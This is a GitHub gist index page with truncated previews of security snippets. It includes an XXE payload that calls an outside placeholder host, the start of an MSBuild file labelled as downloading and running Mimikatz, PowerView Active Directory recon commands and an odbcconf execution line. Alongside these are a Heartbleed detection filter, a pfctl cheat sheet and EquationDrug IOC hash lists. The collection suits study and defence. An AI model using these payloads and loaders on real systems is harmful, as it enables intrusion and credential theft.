Skip to content

Instantly share code, notes, and snippets.

View schrodyn's full-sized avatar

Schrodinger schrodyn

91 followers · 293 following
View GitHub Profile
@schrodyn
schrodyn / XXE_payloads
Created August 30, 2016 15:52 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@schrodyn
schrodyn / scrdec18-VC8.exe
Created September 13, 2016 17:19 — forked from bcse/scrdec18-VC8.exe
Windows Script Decoder 1.8 (Decoding JScript.Encoded)
@schrodyn
schrodyn / katz.xml
Created October 9, 2016 23:12
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@schrodyn
schrodyn / PowerView-2.0-tricks.ps1
Created October 9, 2016 23:35 — forked from HarmJ0y/PowerView-2.0-tricks.ps1
PowerView-2.0 tips and tricks
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
Get-NetLocalGroup -Recurse SERVER.domain.local
# retrieve all the computers a GPP password applies to
@schrodyn
schrodyn / gist:403dbada99efddd574de9e696bbc19ab
Created October 13, 2016 20:57
pfctl cheat sheet
# basic pfctl control
# ==
# Related: http://www.OpenBSD.org
# Last update: Tue Dec 28, 2004
# ==
# Note:
# this document is only provided as a basic overview
# for some common pfctl commands and is by no means
# a replacement for the pfctl and pf manual pages.
@schrodyn
schrodyn / gist:3aec990f926082614a4b51d7d39e5085
Created November 9, 2016 13:27 — forked from crisroura/gist:10473454
Live detection of client heartbleed attack with tcpdump
Slight modification of tcpdump filter expression included in heartbleed.py script by Riverbed [1][2] to detect live client side heartbleed attacks.
Modified the original filter to detect traffic to a specific client host from any port. Also modified lengths check to 68. For more information about this tcpdump filter take a look at Riverbed blog post [2].
Detection tested with https://reverseheartbleed.com
tcpdump -i <INTERFACE> "((not ether proto 0x8100) and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68)))) or (vlan and (tcp and dst host <HOST_IP> and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and ((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 68))))"
Example to detect client heartbleed att
@schrodyn
schrodyn / EquationDrug-IOC-list.txt
Created January 14, 2017 15:45 — forked from msuiche/EquationDrug-IOC-list.txt
List of EquationDrug IOCs #ShadowBrokers
PS E:\ioc> dir . | Foreach-Object{
>> $file = $_
>> $hash = Get-FileHash $file -Algorithm MD5
>> $fileinfo = Get-Item $file
>>
>> New-Object -TypeName PSObject -Property @{
>> LastWriteTime = $fileinfo.LastWriteTime
>> Length = $fileinfo.Length
>> Algorithm = $hash.Algorithm
>> MD5 = $hash.Hash
@schrodyn
schrodyn / ioc-generator.ps1
Created January 14, 2017 15:45 — forked from msuiche/ioc-generator.ps1
PowerShell IOCs generator
dir . | Foreach-Object{
$file = $_
$hash = Get-FileHash $file -Algorithm MD5
$fileinfo = Get-Item $file
New-Object -TypeName PSObject -Property @{
VersionInfo = $fileinfo.VersionInfo
LastWriteTime = $fileinfo.LastWriteTime
Length = $fileinfo.Length
Algorithm = $hash.Algorithm
@schrodyn
schrodyn / equation_drug_hashes.txt
Created January 14, 2017 15:47 — forked from msuiche/equation_drug_hashes.txt
file list equationdrug
61110bea272972903985d5d5e452802c DSZOPSDISK/Resources/Df/Uploads/i386-winnt/DoubleFeatureDll.dll.unfinalized
0d81f9972863c6d8c90100a73b0600ab DSZOPSDISK/Resources/DmGz/Uploads/i386/winnt/ntfltmgr.sys
e14ab6e6ae835792979ff50e647b89c8 DSZOPSDISK/Resources/DSky/Uploads/i386/winnt/tdi6.sys
997ba8c988340a1c644cf9a5f67e4177 DSZOPSDISK/Resources/Ep/Plugins/Files/DuplicateToken_Implant.dll
425fb612ba62fc1ecad9fb24d10f9bfa DSZOPSDISK/Resources/Ep/Plugins/Files/EventLogEdit_Implant.dll
c11142caa3013f852ccb698cc6008b51 DSZOPSDISK/Resources/Ep/Plugins/Files/GetAdmin_Implant.dll
bdd2b462e050ef2fa7778526ea4a2a58 DSZOPSDISK/Resources/Ep/Plugins/Files/kill_Implant.dll
199796e3f413074d5fdef7fe8334eccf DSZOPSDISK/Resources/Ep/Plugins/Files/LSADUMP_Implant.dll
cf5b0d82d39669f584258389f4307b82 DSZOPSDISK/Resources/Ep/Plugins/Files/modifyAudit_Implant.dll
8187650eb74ccb3f0fb647335fd54d30 DSZOPSDISK/Resources/Ep/Plugins/Files/modifyAuthentication_Implant.dll
@schrodyn
schrodyn / file.rsp
Created January 17, 2017 16:43 — forked from NickTyrer/file.rsp
REGSVR odbcconf.dll